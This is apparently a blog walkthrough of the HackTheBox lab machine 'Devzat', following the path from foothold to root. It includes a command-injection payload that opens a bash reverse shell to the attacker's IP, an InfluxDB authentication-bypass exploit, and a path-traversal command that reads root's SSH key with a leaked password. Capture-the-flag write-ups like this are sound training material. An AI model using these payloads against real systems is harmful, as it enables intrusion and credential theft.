Devzat — Hackthebox walkthrough

This machine was a really cool one and I learned a lot from this. It had a pretty unique attack path which I actually loved. Really recommend to anyone who loves to use sneaky ways to exploit a box.

Foothold

Just like always, I started with a nmap scan

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)
|   256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)
|_  256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://devzat.htb/
8000/tcp open  ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-Go
| ssh-hostkey: 
|_  3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)

There were 3 open ports; 22,80 and 8000. Looking at port 80, was a static webpage. It was about a chat client through SSH. Since there were nothing that interesting on the webpage, I started doing some enumeration.

First, I started enumerating subdomains. I tried gobuster first but it didn't seem to work. So I switched to ffuf.

ffuf -u 'http://devzat.htb/' -H 'Host: FUZZ.dezat.htb' -w /usr/share/wordlists/dirb/api_endpoints.txt -fw 18

I found a subdomain called pets.devzat.htb. I added the entry to /etc/hosts file and visited the site. It was a Pet Inventory. At the bottom of the page, there was an input form to add pets.

So I added a new pet and intercepted the request with Burp to see what was happening under the hood. It was a POST request for /api/pet endpoint.

I tired a bunch of ways to exploit this and ended up trying for command injection. Since this didn’t return any data back, I knew I had to look to blind injections.

I was able to do blind command injection by just adding a ;curl 10.10.14.203to the end of the ‘species’ parameter. So I got a shell with this payload.

{"name":"test","species":"cat; bash -c 'bash -i >& /dev/tcp/10.10.14.203/9090 0>&1'"}

This was possible because of passing direct input without proper sanitation to a shell command.

User

I took the SSH private from the patrick user’s home directory and sshed in. There was a devzat directory at the home directory of the patrick user. Since there were lot of files, I greped through them for words like key, passw to see what I get.

grep -R 'key\|passw'

And I saw this devchat.go file with some interesting information.

Reading this, there were 3 interesting things to notice.

• The influxdb was running.
• A new feature was implemented in the devzat application.
• Source for that was left in backups.

I went after these separately, I saw the port 8086 which is the default port for influxdb was open. So to work with that, I forwarded that port to my local box with SSH.

ssh -L 8086:127.0.0.1:8086 -N -vv patrick@devzat.htb -i patrick.id_rsa

Then connected to it with influx. But when I tried to run queries, it errored out asking for authentication. Also I saw that this was running version 1.7.5

Doing a quick google search, I found an Authentication Bypass Exploit for this.

GitHub - LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933: InfluxDB CVE-2019-20933 vulnerability…

So I cloned this and started exploiting this. After connecting, I specified the username as admin. This exploits the authentication function because a JWT token from a request may have an empty SharedSecret. This enables to execute queries as any user without the password.

So I was able to successfully bypass the login.

I found that there was a user table in the devzat database.

show measurements on devzat

With some struggle, finally I was able to list the records of the user table with this command.

SELECT * FROM "devzat"."myretention"."user"

I used this password to login in as catherine.

Root

Second thing I found from the devchat.go file was about the implemented new feature. Also it mentioned about a backup source. Looking at the /var/backups/ I saw there were 2 interesting backup files.

So I downloaded them into my local box and extracted them. This created 2 directories as main and dev. I again used grep to find any interesting things inside these directories.

grep -R ‘key\|pass\|admin’

And I found this password in the commands.go file. Reading this file, I understood that the newly added feature was a way to read files with the file command.

I knew I had to exploit this feature with the password I found. So as said, I connected to the local application which was hosted on port 8443.

ssh -l kavi -p 8443 127.0.0.1

Then, according to the script, I used the file command with the password.

/file test CeilingCatStillAThingIn2021?

But I got an error saying:

Since the script was using the .Join()method to construct the path of the file,

I was able to read the private key of the root user with this command.

/file ../.ssh/id_rsa CeilingCatStillAThingIn2021?

Then I used this to ssh in as root.

ssh root@devzat.htb -i root.id-rsa

Rooted!

“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”

Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/

Happy Hacking !!! 😄